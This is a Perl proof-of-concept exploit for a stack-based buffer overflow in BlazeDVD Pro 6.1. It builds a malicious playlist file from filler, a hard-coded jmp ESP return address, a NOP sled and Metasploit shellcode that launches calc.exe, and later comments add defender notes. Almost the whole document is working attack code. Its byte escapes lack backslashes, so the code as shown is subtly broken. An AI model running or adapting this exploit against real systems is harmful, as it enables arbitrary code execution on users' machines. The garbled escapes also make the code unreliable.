
# Title : BlazeDVD Pro player 6.1 - Stack Based Buffer Overflow (Direct Ret)
# Published : 2013-07-16
# Author :


#!/usr/bin/perl

# BlazeDVD Pro player 6.1  Local stack based buffer overflow
# Author: PuN1sh3r
# Email: luiguibiker@gmail.com
# Date: Mon Jul 15 03:01:37 EDT 2013
# Vendor link: http://www.blazevideo.com/download.htmm
# Software Link: http://www.blazevideo.com/download.php?product=BlazeDVDPro
# App Version: 6.1
# Tested on: Windows 2003 server sp1(EN)
# special thanks to corelanc0d3r for his amazing tutorials


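use strict;
use warnings;

# Builds a crafted .plf playlist file for the stack-overflow condition
# described in the header. Layout of the written data, as the code below
# assembles it: the filler literal repeated 260 times, the value that is
# meant to land on the saved return address (the trailing comment calls it
# a "jmp ESP" inside kernel32.dll), the "x90" literal repeated 50 times,
# then the payload string labelled as a metasploit win/exec calc.exe stub.
#
# Defender notes: the return-address value is a single hard-coded absolute
# address, so the technique presumably depends on that module loading at a
# fixed base (address randomisation on the host defeats that assumption);
# a playlist file made of one long run of identical bytes followed by
# opaque data is a simple artifact to look for in file-based detection.

my $file = "blazeExpl.plf";
my $junk = "x41" x 260;
my $eip  = "x33xFExE4x77"; #jmp ESP on kernel32.dll

#msf win/exec calc.exe [*] x86/alpha_mixed 
my $shellcode = "x89xe7xdaxd4xd9x77xf4x5bx53x59x49x49x49x49" .
"x49x49x49x49x49x49x43x43x43x43x43x43x37x51" .
"x5ax6ax41x58x50x30x41x30x41x6bx41x41x51x32" .
"x41x42x32x42x42x30x42x42x41x42x58x50x38x41" .
"x42x75x4ax49x49x6cx78x68x4dx59x67x70x77x70" .
"x43x30x65x30x6bx39x5ax45x76x51x59x42x52x44" .
"x6ex6bx71x42x46x50x6ex6bx56x32x36x6cx4ex6b" .
"x53x62x66x74x6cx4bx33x42x36x48x34x4fx6fx47" .
"x51x5ax75x76x75x61x39x6fx45x61x79x50x6cx6c" .
"x67x4cx70x61x53x4cx66x62x36x4cx57x50x5ax61" .
"x7ax6fx46x6dx63x31x5ax67x4ax42x4ax50x72x72" .
"x33x67x6cx4bx76x32x76x70x6cx4bx53x72x35x6c" .
"x46x61x4ax70x6ex6bx31x50x50x78x6bx35x39x50" .
"x54x34x62x6ax67x71x4ex30x30x50x6cx4bx52x68" .
"x35x48x6ex6bx70x58x51x30x43x31x6ax73x5ax43" .
"x55x6cx43x79x6cx4bx37x44x4cx4bx37x71x69x46" .
"x36x51x39x6fx46x51x4fx30x4ex4cx4fx31x5ax6f" .
"x64x4dx37x71x5ax67x46x58x79x70x43x45x4bx44" .
"x77x73x31x6dx4bx48x47x4bx51x6dx46x44x50x75" .
"x39x72x30x58x6cx4bx53x68x75x74x35x51x59x43" .
"x65x36x6cx4bx36x6cx52x6bx6ex6bx42x78x47x6c" .
"x63x31x48x53x6ex6bx63x34x4ex6bx56x61x7ax70" .
"x6cx49x73x74x34x64x56x44x63x6bx53x6bx43x51" .
"x61x49x43x6ax66x31x4bx4fx4bx50x31x48x71x4f" .
"x33x6ax6cx4bx32x32x48x6bx6ex66x31x4dx51x7a" .
"x76x61x6cx4dx6ex65x4fx49x37x70x67x70x63x30" .
"x72x70x70x68x44x71x4ex6bx32x4fx6bx37x39x6f" .
"x38x55x4fx4bx7ax50x6dx65x6cx62x70x56x55x38" .
"x6fx56x4dx45x6dx6dx6fx6dx39x6fx4bx65x55x6c" .
"x74x46x63x4cx55x5ax6dx50x49x6bx6bx50x64x35" .
"x67x75x6fx4bx72x67x57x63x71x62x62x4fx30x6a" .
"x57x70x36x33x69x6fx68x55x73x53x61x71x72x4c" .
"x30x63x44x6ex70x65x32x58x32x45x65x50x41x41";

# Assemble filler, return-address value, sled literal and payload in order.
$junk .= $eip . "x90" x 50 . $shellcode ;
###############################################################
# Three-argument open with a lexical handle replaces the bareword two-arg
# form (which lets the mode be altered by the filename) and reports why a
# write fails instead of silently producing an empty or missing file.
open my $fh, '>', $file or die "open $file: $!";
print {$fh} $junk;
# Buffered write errors only surface at close, so check it too.
close $fh or die "close $file: $!";
###############################################################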